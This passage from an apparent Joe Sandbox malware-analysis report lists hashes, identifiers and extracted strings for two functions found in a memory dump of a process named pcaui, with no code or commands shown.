                                                                                                                        • String ID: @$@4Cw@4Cw
                                                                                                                        • API String ID: 4062629308-3101775584
                                                                                                                        • Opcode ID: 94c001418bbc111801b682c7fdc3cda8ade260dbe10253d2d11903fea7ab4779
                                                                                                                        • Instruction ID: 365e07feba72d83670ca86a6e2634c135d821a366d4d742224f6a785ea6f2de8
                                                                                                                        • Opcode Fuzzy Hash: 94c001418bbc111801b682c7fdc3cda8ade260dbe10253d2d11903fea7ab4779
                                                                                                                        • Instruction Fuzzy Hash: 08419EB2A002149FEB21DFA4E880AAEBBF9FF44B04F14443AE905DB250DB749801CF65
                                                                                                                        Function 05393B2F Relevance: 5.0, Strings: 4, Instructions: 30COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3973992378.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_5390000_pcaui.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 95qp$p$ro|e$syta
                                                                                                                        • API String ID: 0-2460837372
                                                                                                                        • Opcode ID: 33eddae6a5e13a3b1b72197834273e0663856a9df791c688360b197c797f9f4e
                                                                                                                        • Instruction ID: 3a6bf2b9f4eedf6fe3507a68867e3bc0f2a90814b7bf97bed205af8e1c3370c8
                                                                                                                        • Opcode Fuzzy Hash: 33eddae6a5e13a3b1b72197834273e0663856a9df791c688360b197c797f9f4e
                                                                                                                        • Instruction Fuzzy Hash: 93F0827111C6848ACB05AB248444759BBE1FFC930CF940AADE8C9DB191DA7A8605C78A